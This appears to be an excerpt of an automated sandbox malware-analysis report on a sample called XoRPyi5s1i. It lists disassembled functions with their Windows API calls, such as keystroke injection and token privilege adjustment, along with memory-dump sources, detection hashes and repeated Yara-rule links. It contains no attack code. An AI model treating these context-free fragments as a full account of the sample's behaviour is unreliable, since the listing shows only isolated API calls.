                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: dcb83755e328d87d7d59ddea08e0ba71d5f81c40b02f68dbd78dae7c75a9fa92
                                    • Instruction ID: c10a431d3d57e2b12ba929fb56a14ea68a12927e4f13a590ccc58f1bf9de5c15
                                    • Opcode Fuzzy Hash: dcb83755e328d87d7d59ddea08e0ba71d5f81c40b02f68dbd78dae7c75a9fa92
                                    • Instruction Fuzzy Hash: 1F1184716006019FD714EF28D885A2EF7E9FF95324F00CA5EF8A9D7291DB70AD018B91
                                    Function 0019F2D0 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,001AE44F,?,?,?), ref: 0019F344
                                      • Part of subcall function 0014B526: GetWindowLongW.USER32(?,000000EB), ref: 0014B537
                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0019F32A
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: LongWindow$DialogMessageNtdllProc_Send
                                    • String ID:
                                    • API String ID: 1273190321-0
                                    • Opcode ID: d788c2a062f0ff47de6bce5af75eeca50adb2e1b7ac701977d76deaaa66af60c
                                    • Instruction ID: 162acca3738719d1dc2918083922d7348c2c399feca218c51679a92d4cdc0c11
                                    • Opcode Fuzzy Hash: d788c2a062f0ff47de6bce5af75eeca50adb2e1b7ac701977d76deaaa66af60c
                                    • Instruction Fuzzy Hash: C4019A35204204BBCF259F15EC84EAA7B76FB95734F184528F9069B2A0C7B5A842DB50
                                    Function 0019F689 Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ClientToScreen.USER32(?,?), ref: 0019F6AC
                                    • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,001AE52B,?,?,?,?,?), ref: 0019F6D5
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ClientDialogNtdllProc_Screen
                                    • String ID:
                                    • API String ID: 3420055661-0
                                    • Opcode ID: 4d7c6954b29507922ec009ca676ff1971dc4065b16afe0aa7ea5585cf9c2c870
                                    • Instruction ID: 6107dedbd40e974fab78caa5199f4cb16a8d25f75841e6eeabf0cf51a298152d
                                    • Opcode Fuzzy Hash: 4d7c6954b29507922ec009ca676ff1971dc4065b16afe0aa7ea5585cf9c2c870
                                    • Instruction Fuzzy Hash: BCF0FE72410218FFEF099F95EC099BE7FB9FF44311F14415AF901A2560D7B1AA91EB60
                                    Function 0017CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0018BE6A,?,?,00000000,?), ref: 0017CEA7
                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0018BE6A,?,?,00000000,?), ref: 0017CEB9
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ErrorFormatLastMessage
                                    • String ID:
                                    • API String ID: 3479602957-0
                                    • Opcode ID: 3002dcd139b29ad2954a26da0dc8f789a1bfca8181e26869602ba17ac3e9b822
                                    • Instruction ID: b8458d206a78257b277233d9e765b768b45a534bede969501091533c667b2186
                                    • Opcode Fuzzy Hash: 3002dcd139b29ad2954a26da0dc8f789a1bfca8181e26869602ba17ac3e9b822
                                    • Instruction Fuzzy Hash: B0F08271100229EBDB109FA4DC49FEA777DBF08361F008169F919D6191D7709A44CBA0
                                    Function 0017411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00174153
                                    • keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 00174166
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: InputSendkeybd_event
                                    • String ID:
                                    • API String ID: 3536248340-0
                                    • Opcode ID: bf46206d167530439e1373830f739ea93263daba0974dc37f4ceb22c61684c1c
                                    • Instruction ID: 5654c84b924a694dc5e0a94cdce8afccb39925f2cb16e7cfe9cf33793ed14790
                                    • Opcode Fuzzy Hash: bf46206d167530439e1373830f739ea93263daba0974dc37f4ceb22c61684c1c
                                    • Instruction Fuzzy Hash: 9AF0907080034DAFDB059FA0C805BBE7FB0EF00305F048009F96596191D779D652DFA0
                                    Function 0016AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0016ACC0), ref: 0016AB99
                                    • CloseHandle.KERNEL32(?,?,0016ACC0), ref: 0016ABAB
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AdjustCloseHandlePrivilegesToken
                                    • String ID:
                                    • API String ID: 81990902-0
                                    • Opcode ID: 404950123514254210386b0291d1da8dcb3389ea89ae40c2e4a8deb6b1cf4994
                                    • Instruction ID: 83d9942dafb3042943dfa32774655165998b599d94b69a629be2c4d9c8727fb4
                                    • Opcode Fuzzy Hash: 404950123514254210386b0291d1da8dcb3389ea89ae40c2e4a8deb6b1cf4994
                                    • Instruction Fuzzy Hash: CDE0EC76004610AFE7292F64FC09D77BBE9EF04321B20892DF99AC5875DB62ACD1DB50
                                    Function 0019F7C3 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowLongW.USER32(?,000000EC), ref: 0019F7CB
                                    • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,001AE4AA,?,?,?,?), ref: 0019F7F5
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: b47b45b774f701246508c4551b1e17d4f19d43d227a4d72840d56cdf726c4657
                                    • Instruction ID: 7f40a2b52fe716ce618e282ce2d3f41ae5582bc18d1e1526889a23c9604dbdac
                                    • Opcode Fuzzy Hash: b47b45b774f701246508c4551b1e17d4f19d43d227a4d72840d56cdf726c4657
                                    • Instruction Fuzzy Hash: 19E0C230104219BBEF2C0F09EC1AFB93F28EB00B50F108229F95BD84E0E7B098D1D660
                                    Function 001581AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00156DB3,-0000031A,?,?,00000001), ref: 001581B1
                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 001581BA
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 3138dc51dfe9fade7e833db4c95b460606c54696464fa56328970a45c3575e37
                                    • Instruction ID: 76c91d2dab12d0fa8f6e2b638ebde9307b808e6ca4f9ed2fbb9c74fe29065633
                                    • Opcode Fuzzy Hash: 3138dc51dfe9fade7e833db4c95b460606c54696464fa56328970a45c3575e37
                                    • Instruction Fuzzy Hash: E4B092B1044608ABDB042BA1FC0AB587FA8FB08652F044120F60D44872AB7354908B92
                                    Function 001377B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    • API String ID: 4104443479-0
                                    • Opcode ID: 23308322fe17d502c3bfd270103535fb451083646484aab8905d9ef077706fe6
                                    • Instruction ID: d549372d08a655ae94db074f27f7cae1bf5a6df5a3e8a05de1935ccd9dc0c2b7
                                    • Opcode Fuzzy Hash: 23308322fe17d502c3bfd270103535fb451083646484aab8905d9ef077706fe6
                                    • Instruction Fuzzy Hash: 2BA23BB4E04219DFDB28CF58C4806EDBBB1FF49314F2681A9E859AB391D7349E81DB50
                                    Function 0015D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1aaa0ac6240d97c9f7d138a51f000f6604fb9a90d5aa76ef15d777f188584f38
                                    • Instruction ID: f17c8894790542ae71e96646ae76005018da88d1d91ad4edecdd7b8e6f1a1811
                                    • Opcode Fuzzy Hash: 1aaa0ac6240d97c9f7d138a51f000f6604fb9a90d5aa76ef15d777f188584f38
                                    • Instruction Fuzzy Hash: 07320422D29F018ED7239634D862335A698AFB73D5F15D727E829B9DA6DF29C4C34200
                                    Function 001396C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __itow__swprintf
                                    • String ID:
                                    • API String ID: 674341424-0
                                    • Opcode ID: ae0b278071b3c3fe8334b35d452e80624851a6e2aaad8da934f050f5edec99bb
                                    • Instruction ID: 1810ee76806222e364eaf812219c94fef48159a322d9eed8b2cb15bafaa8dec7
                                    • Opcode Fuzzy Hash: ae0b278071b3c3fe8334b35d452e80624851a6e2aaad8da934f050f5edec99bb
                                    • Instruction Fuzzy Hash: 7622CA716083019FD728DF24C891B6FB7E4BF95314F10492DF89A9B2A1DBB1E944CB92
                                    Function 0016038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ca8b6b5a563b2535c662f75579a50c2cda58e5a1fba441676e6855be3d749513
                                    • Instruction ID: 7637f88278b0f866aecf30603ea3f983a8f03c02f54a69be524a933514b17686
                                    • Opcode Fuzzy Hash: ca8b6b5a563b2535c662f75579a50c2cda58e5a1fba441676e6855be3d749513
                                    • Instruction Fuzzy Hash: 36B1E320D2AF414DD32396398831336BA5DAFBB2D5F91D71BFC1AB4D22EB2195D34180
                                    Function 0017B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                    Download Yara Rule
                                    APIs
                                    • __time64.LIBCMT ref: 0017B6DF
                                      • Part of subcall function 0015344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0017BDC3,00000000,?,?,?,?,0017BF70,00000000,?), ref: 00153453
                                      • Part of subcall function 0015344A: __aulldiv.LIBCMT ref: 00153473
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Time$FileSystem__aulldiv__time64
                                    • String ID:
                                    • API String ID: 2893107130-0
                                    • Opcode ID: 3377b3f4c9eca5aa68d9b041e3ffb8dd6777608b48a47eedf7ea10b4f5a0d012
                                    • Instruction ID: 163fe7038f21758aeff3789cf78dbf4aa1c6b6b4f5f7d813ef212c74c3f7bf69
                                    • Opcode Fuzzy Hash: 3377b3f4c9eca5aa68d9b041e3ffb8dd6777608b48a47eedf7ea10b4f5a0d012
                                    • Instruction Fuzzy Hash: 3C217F76634510CBC729CF28C881BA2B7E1EB95310B248E6DE4E9CF2C0CB74BA45DB54
                                    Function 001A044C Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 001A04F4
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: 80fc72a1c55df5af7d50c28629b0059b0843ef605448d0c9e2e4824ba028d081
                                    • Instruction ID: 5d95b931b15b993cdea2662e75b46b379ca873eb797e67dbe899d653aa63c380
                                    • Opcode Fuzzy Hash: 80fc72a1c55df5af7d50c28629b0059b0843ef605448d0c9e2e4824ba028d081
                                    • Instruction Fuzzy Hash: 4A110A74204215BAFF2A9A28DD15F793614AB4FB30F208314FA125A5D2CBA45D409264
                                    Function 001A00AF Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014B526: GetWindowLongW.USER32(?,000000EB), ref: 0014B537
                                    • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,001AE467,?,?,?,?,00000000,?), ref: 001A0127
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: 006e0eb6992f48b1a9f325a81a4ba5a3488b4053a59a1b6620f831ae61834f67
                                    • Instruction ID: 8c0fadf619988b57687277e63c9fc4e40050220aadc16ec8771cc4abb0114a9b
                                    • Opcode Fuzzy Hash: 006e0eb6992f48b1a9f325a81a4ba5a3488b4053a59a1b6620f831ae61834f67
                                    • Instruction Fuzzy Hash: A101D479600118ABDF199F24DC4ABF93BA2EF4E370F184129FA5957192C375EC60D7A0
                                    Function 0019E9AF Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014B526: GetWindowLongW.USER32(?,000000EB), ref: 0014B537
                                    • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 0019E9F5
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$CallLongProc
                                    • String ID:
                                    • API String ID: 4084987330-0
                                    • Opcode ID: 0a169d8331c6a934cd73746efe45496b6b716662373498a2f14bda20e17a5541
                                    • Instruction ID: c63077858e9f76027deb512a3f51fdf6f64b5a48f59901ccc6086ee90682bbc8
                                    • Opcode Fuzzy Hash: 0a169d8331c6a934cd73746efe45496b6b716662373498a2f14bda20e17a5541
